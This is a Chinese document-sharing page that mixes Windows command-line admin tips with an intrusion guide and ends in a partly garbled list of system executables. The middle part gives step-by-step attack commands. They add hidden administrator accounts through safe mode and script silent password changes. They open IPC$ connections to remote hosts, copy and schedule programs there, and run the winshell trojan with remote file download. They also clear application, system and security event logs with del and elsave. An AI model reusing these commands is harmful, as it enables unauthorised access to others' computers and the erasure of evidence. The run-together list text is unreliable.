电脑运行命令口令
- 格式:docx
- 大小:17.06 KB
- 文档页数:3
作为网管员你可以运用的网管工具可能很多,今天我们看看Windows自带的一些命令行工具,这些工具还没有被我们充分重视。
虽然其功能强大,却“免费”、易用。
而且作为一名计算机工作的老战士,我们也会很怀念这些命令工具,用起来也会得以应手。
根据笔者的经验,下面的这些工具对系统安全或网络管理大有可为。
首先,启动命令提示符窗口。
(单击“开始”/“运行”,输入“cmd.exe”,单击“确定”。
)1.sc stop 服务名,此命令可以终止某项Windows服务。
如图1:想要查看有哪些与进程有关的服务,请键入如下的命令:tasklist /svc。
2.ping IP地址–t:探测指定的主机直至用户终止,这是查看对方主机是否活动的好方法。
想查看统计数据并继续,按ctrl+Break键;想立即终止按ctrl+c键。
如图2:3.dir c:\ /s /b | find “ssn”或dir c:\ /s /b | find “password”此命令在计算机c盘上查找所有的包含敏感文本“ssn”或“password”的文件。
如图3:4.findstr /s /i secret *.*或findstr /s /i confidential *.*搜索当前目录及所有的子目录,查找机密信息“secret”或“confidential”。
5. nslookup –type=any 域名(不可使用IP地址)如:nslookup –type=any ,如下图4:6.nbtstat –a 远程主机的IP地址,如nbtstat –a 192.168.1.23如上图5所示,这个命令会显示一个远程系统的NetBIOS名称表、主机名、域名、MAC地址,如果可能还会显示当前登录的用户名。
view 主机名,如net view thiscomputer,其作用是显示一个远程系统上的共享。
accounts:显示本地用户账户的口令策略,如图6:sh interface ip set address name="Local Area Connection" static 静态IP地址子网掩码默认网关此命令用来更改计算机的IP地址或者配置TCP/IP的其它相关属性,如:netsh interface ip set address name="Local Area Connection" static 192.168.1.22 255.255.255.0 192.168.1.1上面的命令为计算机的“本地连接”指定一个静态的IP地址:192.168.1.22,设置其子网掩码为255.255.255.0,并指定默认网关为192.168.1.1stat –a –o此命令可以决定当前与拥有每个连接的进程ID一起使用的TCP和UDP连接,可以用于找出哪些应用程序正与谁会话。
5种方法强行开机方法一在开机时,按下F8进入”带命令提示符的安全”模式输入”NET USER+用户名+123456/ADD”可把某用户的密码强行设置为”123456″方法二如用户忘记登入密码可按下列方法解决1.在计算机启动时按〔F8〕及选〔Safe Mode With Command Prompt〕2.选〔Administrator〕后便会跳出〔Command Prompt〕的窗口3.用〔Net〕的命令增加一个用户,例:增加一个用户名为alanhkg888,命令语法如下:net user alanhkg888/add 4.将新增用户提升至Administrator的权力,例:提升刚才增加用户alanhkg888的权力,命令语法如下net localgroup administrators alanhkg888/add 5.完成上列步骤后重新启动计算机,在启动画面上便增加了一个用户alanhkg888了,选alanhkg888进入6.登入后在〔控制台〕→〔使用者账户〕→选忘记密码的用户,然后选〔移除密码〕后〔等出〕7.在登入画面中选原来的用户便可不需密码情况下等入(因已移除了)8.删除刚才新增的用户,在〔控制台〕→〔使用者账户〕→选〔alanhkg888〕,然后选〔移除账户〕便可*不适用于忘记安装时所设定〔administrator〕的密码方法三1、重新启动Windows XP,在启动画面出现后的瞬间,按F8,选择”带命令行的安全模式”运行。
2、运行过程停止时,系统列出了超级用户administrator和本地用户owner的选择菜单,鼠标点击administrator,进入命令行模式。
3、键入命令:”net user owner 123456/add”,强制性将OWNER用户的口令更改为”123456″。
若想在此添加某一用户(如:用户名为abcdef,口令为123456) 的话,请键入”net user abcdef 123456/add”,添加后可用”net localgroup administrators abcdef/add”命令将用户提升为系统管理组administrators用户,具有超级权限。
如何开机实现动态口令最近从事了一段时间的电脑工作,其间接触了不少的人和事,特别是电脑的开机口令让人觉得很烦,便思索能不能有一种方法,让今天的口令,关机以后,明天开机自动更换新口令呢?闲来,便开始琢磨这件事,嘿,还别说,还就真的搞成了,不过还都用的是比较简单的知识(命令行修改口令、脚本知识),请跟我来吧。
(1)基础知识首先,得补充一下基本知识,在windows xp中,除了进控制面板中的用户选项可以修改口令,还可以在cmd的命令行中修改口令。
方法是点击最左下角开始->运行,在文本行中输入cmd加enter(回车键)即可进入如下界面:在上图的Administrator>后面输入net user administrator “123”再按回车键,如下图就可以成功地修改超级用户administrator的口令为123(2)编写实现功能的脚本文件其次,这样可以一次修改一个口令,那么,能不能写一个脚本,让它自动根据今天的时间来自动指定一个口令来修改呢?我们说,完全可以,只不过,要用到一此简单的脚本知识下面是源代码(文件名为chgpass.vbs):'定义一个脚本shellDim Wshset Wsh = CreateObject("wscript.Shell")Dim n_day'取得今天的日期n_day=Day(Date())‘临时口令Dim tmpPassIf n_day Mod 2=1 Then '如果日期是奇数,则运行后口令为1tmpPass="1"Wsh.Run "cmd /c " & "net user administrator " &tmpPass ,0Else '如果日期是偶数,则运行后口令为0tmpPass="0"Wsh.Run "cmd /c " & "net user administrator " &tmpPass ,0End If'释放shell所占内存准备退出Set Wsh=Nothing ‘源代码结束上面代码中,wsh.run "cmd /c " & "net user administrator " &tmpPass ,0最后的,0是为了运行cmd 窗口时隐身和不惊动其它人,使效果更好。
菜鸟常用命令(与远程主机建立空管连接)net use \\ip地址\ipc$ "" /use:""(以管理员身份登录远程主机)net use \\ip地址\ipc$ "密码" /use:"administrator"(传送文件到远程主机winnt目录下)copy 本机目录路径\程序\\ip地址\admin$(查看远程主机时间)net time \\ip地址(定时启动某个程序)at \\ip地址02:18 readme.exe(查看共享)net view \\ip地址(查看netbios工作组列表)nbtstat -a ip地址(将远程主机c盘映射为自己的f盘)net use f: \\ip地址\c$ ""/user:"administrator"(这两条把自己增加到管理员组):net user 用户名密码/addnet localgroup administrators 用户名/add(断开连接)net use \\ip地址\ipc$ /deletedel c:\winnt\system32\logfiles\*.*del c:\winnt\ssytem32\config\*.evtdel c:\winnt\system32\dtclog\*.*del c:\winnt\system32\*.logdel c:\winnt\system32\*.txtdel c:\winnt\*.txtdel c:\winnt\*.log一、netsvc.exe下面的命令分别是列出主机上的服务项目、查寻和远程启动主机的“时间任务”服务:netsvc /list \\ip地址netsvc schedule \\ip地址/querynetsvc \\ip地址schedule /start二、opentelnet.exe远程启动主机的telnet服务,并绑定端口到7878,例如:opentelnet \\ip地址用户名密码1 7878然后就可以telnet到主机的7878端口,进入dos方式下:telnet ip地址7878三、winshell.exe一个非常小的木马(不到6k),telnet到主机的7878端口,输入密码winshell,当看到cmd>后,可打下面的命令:p path (查看winshell主程序的路径信息)b reboot (重新启动机器)d shutdown (关闭机器)s shell (执行后你就会看到可爱的“c:\>”)x exit (退出本次登录会话,此命令并不终止winshell的运行)cmd> http://.../srv.exe (通过http下载其他网站上的文件到运行winshell的机器上)四、3389登陆器,gui方式登录远程主机的五、elsave.exe事件日志清除工具elsave -s \\ip地址-l "application" -celsave -s \\ip地址-l "system" -celsave -s \\ip地址-l "security" -c执行后成功清除应用程序日志,系统日志,安全日志六、hbulot.exe开启win2kserver和winxp的3389服务hbulot [/r]使用/r表示安装完成后自动重起目标使设置生效。
magnify.exe 放大镜
makecab.exe 制作CAB文件
mem.exe 显示内存状态
migpwd.exe 迁移密码
mmc.exe 控制台
mnmsrvc.exe 远程桌面共享
mobsync.exe 同步目录管理器
mountvol.exe 创建、删除或列出卷的装入点。
mplay32.exe Media Player 媒体播放器
mpnotify.exe 通知应用程序
mqbkup.exe 信息队列备份和恢复工具
mqmig.exe MSMQ Migration Utility 信息队列迁移工具
mrinfo.exe 使用SNMP多点传送路由
mscdexnt.exe 安装MSCD
msdtc.exe 动态事务处理控制台
msg.exe 发送消息到本地或远程客户
mshta.exe HTML应用程序主机
msiexec.exe 开始Windows安装程序
mspaint.exe 打开画图板
mstask.exe 任务计划表程序
mstinit.exe 任务计划表安装
Msconfig.exe 系统配置实用程序(配置启动选项,服务项)
mem.exe 显示内存使用情况
mspaint 画图板
Net Stop Messenger 停止信使服务
Net Start Messenger 恢复信使服务
nslookup 网络管理的工具
Nslookup IP 地址侦测器
ntbackup 系统备份和还原
nbtstat.exe 使用NBT(TCP/IP 上的NetBIOS)显示协议统计和当前TCP/IP 连接。
nddeapir.exe NDDE API服务器端
netsh.exe 用于配置和监控Windows 2000 命令行脚本接口(XP不可用)
netstat.exe 显示协议统计和当前的TCP/IP 网络连接。
nlsfunc.exe 加载特定国家的信息。
Windows 2000 和MS-DOS 子系统不使用该命令接受该命令只是为了与MS-DOS 文件兼容。
notepad.exe 打开记事本
nslookup.exe 该诊断工具显示来自域名系统(DNS) 名称服务器的信息。
ntbackup.exe 备份和故障修复工具
ntfrs.exe NT文件复制服务(XP不可用)
ntvdm.exe 模拟16位Windows环境
nw16.exe NetWare转向器
nwscript.exe 运行Netware脚本
odbcad32.exe 32位ODBC数据源管理(驱动程序管理)
odbcconf.exe 命令行配置ODBC驱动和数据源
packager.exe 对象包装程序
pathping.exe 包含Ping和Tracert的程序
pentnt.exe 检查Pentium的浮点错误
perfmon.exe 系统性能监视器
ping.exe 验证与远程计算机的连接
posix.exe 用于兼容Unix
print.exe 打印文本文件或显示打印队列的内容。
progman.exe 程序管理器
psxss.exe Posix子系统应用程序
qappsrv.exe 在网络上显示终端服务器可用的程序
qprocess.exe 在本地或远程显示进程的信息(需终端服务)
query.exe 查询进程和对话(XP不可用)
quser.exe 显示用户登陆的信息(需终端服务)
qwinsta.exe 显示终端服务的信息
rononce -p 15秒关机
rasAdmin 远程访问服务.
regedit.exe 注册表编辑器
rasadmin.exe 启动远程访问服务(XP不可用)
rasautou.exe 建立一个RAS连接
rasdial.exe 宽带,拨号连接
ras.exe 运行RAS连接(XP不可用)
rcp.exe 计算机和运行远程外壳端口监控程序rshd 的系统之间复制文件
rdpclip.exe 终端和本地复制和粘贴文件
recover.exe 从坏的或有缺陷的磁盘中恢复可读取的信息。
redir.exe 运行重定向服务
regedt32.exe 32位注册服务
regini.exe 用脚本修改注册许可
regwiz.exe 注册向导
replace.exe 用源目录中的同名文件替换目标目录中的文件。
rexec.exe rexec 命令在执行指定命令前,验证远程计算机上的用户名,只有安装了TCP/IP 协议后才可以使用该命令。
risetup.exe 运行远程安装向导服务(XP不可用)
route.exe 控制网络路由表
rsh.exe 在运行RSH 服务的远程计算机上运行命令
rsnotify.exe 远程存储通知回显
runas.exe 允许用户用其他权限运行指定的工具和程序
rundll32.exe 启动32位DLL程序
rwinsta.exe 重置会话子系统硬件和软件到最初的值
Sndvol32 音量控制程序
sfc.exe 或CMD\ sfc.exe 回车系统文件检查器
services.msc 网络连接服务
syskey 系统加密,(一旦加密就不能解开,保护windows xp系统的双重密码wupdmgr WIDNOWS UPDATE)
SCANREG/RESTORE 命令恢复最近的注册表
secedit.exe 自动化安全性配置管理
services.exe 控制所有服务
sethc.exe 设置高对比
setver.exe 设置MS-DOS 子系统向程序报告的MS-DOS 版本号sfc.exe 系统文件检查
shadow.exe 监控另外一台中端服务器会话
shrpubw.exe 建立和共享文件夹
sigverif.exe 文件签名验证
smlogsvc.exe 性能日志和警报(XP不可用)
sndrec32.exe 录音机
sndvol32.exe 显示声音控制信息
snmp.exe 简单网络管理协议(XP不可用)
snmptrap.exe SNMP工具(XP不可用)
srvmgr.exe 服务器管理器(XP不可用)
subst.exe 将路径与驱动器盘符关联
sysedit.exe 系统配置编辑器
syskey.exe NT账号数据库加密工具
sysocmgr.exe > Windows 安装程序
systray.exe 在低权限运行systray
taskmgr 任务管理器。